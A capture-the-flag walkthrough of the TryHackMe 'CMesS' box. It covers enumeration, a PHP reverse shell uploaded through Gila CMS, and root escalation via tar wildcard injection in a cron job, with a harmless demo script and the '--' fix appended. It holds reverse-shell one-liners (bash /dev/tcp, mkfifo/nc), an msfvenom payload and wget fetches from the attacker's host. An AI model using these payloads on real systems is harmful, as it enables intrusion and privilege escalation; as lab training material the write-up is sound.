TryHackMe: CMesS
[Enumeration]
1. Add the IP to /etc/hosts
2. Access the site. Nothing much there.
3. Port scan
nmap -Pn cmess.thm
There are 2 open ports: 22 and 80.
4. OS and service scan
nmap -p 22,80 -A cmess.thm
There's a robots.txt.
Access it. There are 3 disallowed entries.
Access all of them. Forbidden!!!
5. Vuln scan
nmap --script vuln -p 22,80 cmess.thm
There's an "admin" folder.
6. Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://cmess.thm/ -x php,txt,html,sh,cgi,js
7. Access “/admin”
[Exploitation]
1. Find credentials for Gila CMS
I cannot find any default credentials, so let's guess with:
admin:admin
It fails: the login form expects an email address, not a username.
2. Search for subdomains
Since I have already tried every directory on the site and found nothing more, I will search for subdomains (virtual hosts) instead.
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" --hw 290 -H "Host: FUZZ.cmess.thm"
--hw 290 hides every response with the same word count as the default site, so only a vhost that answers differently shows up. Add the subdomain to /etc/hosts.
Access it. There are 2 users: andre@cmess.thm with password "KPFTN_f2yxe%", and support@cmess.thm.
3. Try to log in with the credentials.
Back to http://cmess.thm/admin
It's Gila CMS version 1.10.9.
4. Search for exploits
searchsploit gila cms
There's an LFI.
Read it.
searchsploit -x 47407
Following the guide I typed:
cmess.thm/admin/fm/?f=src../../../../../../../../../../etc/passwd
Failed!!! But I'm redirected to the file manager instead. I can use it to upload a reverse shell.
5. Prepare a PHP reverse shell.
<?php
// Spawn an interactive bash and redirect its stdin/stdout/stderr to the attacker's listener.
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>
Upload it through the file manager; the file is stored under /assets.
Prepare a listener on port 1234
nc -lvp 1234
Access the file in /assets:
http://cmess.thm/assets/reverse_shell.php
Back to listener, now I have a shell.
[Privilege Escalation]
1. Let's explore the machine.
cd /home
ls -la andre
Permission denied.
cd /opt
ls -la
There's a hidden file.
cat .password.bak
2. Log in as andre with the recovered password
ssh andre@cmess.thm
From the login banner, this machine is 64-bit.
3. Find user.txt
pwd
ls -la
cat user.txt
4. Escalate to root
Upload lse.sh (linux-smart-enumeration) to the machine.
Prepare an HTTP server on the attacking machine
python -m SimpleHTTPServer 80
Download it on the target
wget http://<ip>/lse.sh
Make it executable
chmod +x lse.sh
Run it (-l 1 for level 1 verbosity, -i for non-interactive so it never prompts for a password)
./lse.sh -l 1 -i | more
Nothing much, only that there are 2 users with a shell: root and andre.
Some checks (the sudo ones) need andre's password, so run it again without -i
./lse.sh -l 1 | more
The result isn't any different. I have to do manual enumeration.
sudo -l
Check /etc/passwd permissions
ls -la /etc/passwd
Check /etc/shadow permissions
ls -la /etc/shadow
Check SUID and SGID.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Check cron
cat /etc/crontab
The crontab runs a tar backup of /home/andre/backup as root every 2 minutes, with an unquoted wildcard (*). The shell expands * to the file names in that directory, so file names that look like tar options are parsed as options, and I can inject a reverse shell through tar's --checkpoint-action=exec option.
Create the reverse shell.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=1235 -f elf -o shell.elf
Download it on the victim machine, into the directory the cron job archives.
cd /home/andre/backup
wget http://<ip>/shell.elf
Prepare a listener on port 1235
Let's inject the command.
Looking at GTFOBins, I have to add the checkpoint files.
touch ./--checkpoint=1
touch ./--checkpoint-action=exec=shell.elf
ls -la
After waiting 2 minutes I still don't have a shell. A likely cause is that tar runs the exec action through /bin/sh, so a bare shell.elf is looked up in PATH rather than in the current directory, and the file was never marked executable anyway. I have to try another way.
Delete the former command file
rm ./--checkpoint-action\=exec\=shell.elf
Create a new reverse shell command as a script, and invoke it through sh so neither PATH nor the executable bit matters.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1235 >/tmp/f" > shell.sh
cat shell.sh
touch "./--checkpoint-action=exec=sh shell.sh"
ls -la
The quotes matter: the file name contains a space, and ./--checkpoint=1 from before is still in place. Wait about 2 minutes. Now I have a shell.
Verify the user
id
I’m root.
Read root.txt
cd /root
ls
cat root.txt
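The tar wildcard injection used against the cron job above, reproduced as an added example that is not part of the original writeup. It runs the same shape of command the cron job is assumed to run (cd into the backup directory, then tar -zcf <archive> * with an unquoted wildcard; the archive path is an assumption) in a scratch directory as an unprivileged user, so the mechanism can be checked before relying on it. The payload is a script invoked with "sh shell.sh", exactly as in the working attempt, and it only records which user ran it instead of spawning a reverse shell. The "fixed" mode shows the hardened command with "--", which stops the trick files from being parsed as options.

```bash
#!/bin/bash
# Added example (not from the original writeup): reproduce the tar wildcard
# trick in a temporary directory. GNU tar is required for --checkpoint.
#
# Assumed cron job on the box:
#   cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
# Only the unquoted * matters: the shell expands it to the file names, so a
# file named --checkpoint=1 becomes a tar option, and
# --checkpoint-action=exec=... makes tar run a command via /bin/sh.

# Seed a directory with the trick files, run the "cron job" against it and
# report whether the payload executed.
#   $1: "vulnerable" uses the bare *, "fixed" uses -- before the *.
# Returns 0 if the payload ran, 1 if it did not, 2 on setup failure.
tar_wildcard_demo() {
    local mode="$1" work marker rc
    work=$(mktemp -d) || return 2
    marker="$work/proof"
    mkdir "$work/backup" || return 2

    # Attacker's payload: a script, so "sh shell.sh" works even though
    # shell.sh is neither executable nor on PATH. It just records the user
    # it ran as; on the box it would start the reverse shell.
    printf '#!/bin/sh\nid -un > "%s"\n' "$marker" > "$work/backup/shell.sh"

    # The two option-shaped file names. Quoting keeps the space in the second.
    touch "$work/backup/--checkpoint=1"
    touch "$work/backup/--checkpoint-action=exec=sh shell.sh"

    # Some real data so the archive is not empty.
    echo "backup me" > "$work/backup/notes.txt"

    if [ "$mode" = "fixed" ]; then
        # Hardened form: "--" ends option parsing, so the trick files are
        # archived as ordinary entries and nothing is executed.
        ( cd "$work/backup" && tar -zcf "$work/backup.tar.gz" -- * ) >/dev/null 2>&1
    else
        # Vulnerable form, as the cron job runs it.
        ( cd "$work/backup" && tar -zcf "$work/backup.tar.gz" * ) >/dev/null 2>&1
    fi

    rc=1
    if [ -s "$marker" ]; then
        echo "[$mode] payload executed as $(cat "$marker")"
        rc=0
    else
        echo "[$mode] payload did not run"
    fi
    rm -rf "$work"
    return "$rc"
}

# Stand-alone run: the vulnerable command executes the payload, the fixed one does not.
tar_wildcard_demo vulnerable || true
tar_wildcard_demo fixed || true
```

Run it as any user; no root is needed because the point is tar's option parsing, not cron. When the real job runs as root, the same mechanism executes the payload as root, which is why the cron line needs "--" (or an explicit path list) rather than a bare wildcard.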